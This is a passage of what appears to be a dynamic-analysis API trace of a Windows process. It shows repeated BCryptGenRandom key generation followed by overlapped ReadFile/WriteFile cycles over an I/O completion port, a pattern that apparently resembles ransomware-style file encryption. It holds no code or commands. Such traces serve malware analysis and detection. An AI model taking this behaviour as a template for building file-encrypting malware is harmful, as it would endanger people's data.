lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.034] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.034] free (_Block=0x3e305b8) [0150.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.034] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.034] free (_Block=0x1fa91d0) [0150.034] free (_Block=0x1fa2ed8) [0150.034] free (_Block=0x1fa90b8) [0150.035] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.036] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.101] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.113] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x11b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.134] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.134] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.134] free (_Block=0x3e305b8) [0150.134] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.134] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.134] free (_Block=0x1fa91d0) [0150.134] free (_Block=0x1fa2ed8) [0150.134] free (_Block=0x1fa90b8) [0150.135] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.135] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.147] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x2080, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.158] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.275] CloseHandle (hObject=0x170) returned 1 [0150.275] free (_Block=0x1ff1e60) [0150.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.290] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.299] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.321] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x164c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.329] CloseHandle (hObject=0x170) returned 1 [0150.329] free (_Block=0x1ff1e60) [0150.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.330] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.356] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x668c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.367] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x849c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.385] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.385] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.385] free (_Block=0x3e305b8) [0150.385] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.385] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.386] free (_Block=0x1fa91d0) [0150.386] free (_Block=0x1fa2ed8) [0150.386] free (_Block=0x1fa90b8) [0150.386] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.392] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x5cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.406] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.406] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.406] free (_Block=0x3e305b8) [0150.406] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.406] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.407] free (_Block=0x1fa91d0) [0150.407] free (_Block=0x1fa2ed8) [0150.407] free (_Block=0x1fa90b8) [0150.407] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.422] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.422] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.422] free (_Block=0x3e305b8) [0150.422] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.422] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.422] free (_Block=0x1fa91d0) [0150.422] free (_Block=0x1fa2ed8) [0150.422] free (_Block=0x1fa90b8) [0150.423] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.437] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.437] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.437] free (_Block=0x3e305b8) [0150.437] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.437] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.437] free (_Block=0x1fa91d0) [0150.437] free (_Block=0x1fa2ed8) [0150.437] free (_Block=0x1fa90b8) [0150.437] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0150.443] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.443] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.443] free (_Block=0x3e305b8) [0150.443] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.443] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.443] free (_Block=0x1fa91d0) [0150.443] free (_Block=0x1fa2ed8) [0150.443] free (_Block=0x1fa90b8) [0150.443] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0150.444] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.830] CloseHandle (hObject=0xec) returned 1 [0150.831] free (_Block=0x1ff1e60) [0150.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.831] CloseHandle (hObject=0x3cc) returned 1 [0150.832] free (_Block=0x3d70450) [0150.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.833] CloseHandle (hObject=0x308) returned 1 [0150.833] free (_Block=0x3df0008) [0150.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.833] CloseHandle (hObject=0x170) returned 1 [0150.833] free (_Block=0x3ef0008) [0150.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0151.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.093] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0152.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0152.103] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.103] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.103] free (_Block=0x3e305b8) [0152.103] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.103] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.105] free (_Block=0x1fa91d0) [0152.105] free (_Block=0x1fa2ed8) [0152.113] free (_Block=0x1fa90b8) [0152.113] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.117] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.148] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x199a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.192] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.203] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.213] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.715] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x5480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0152.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0152.725] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.725] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.725] free (_Block=0x3e305b8) [0152.725] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.726] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.726] free (_Block=0x1fa91d0) [0152.726] free (_Block=0x1fa2ed8) [0152.726] free (_Block=0x1fa90b8) [0152.726] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.726] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.732] CloseHandle (hObject=0xec) returned 1 [0152.732] free (_Block=0x3ef0008) [0152.733] GetQueuedCompletionStatus (in: 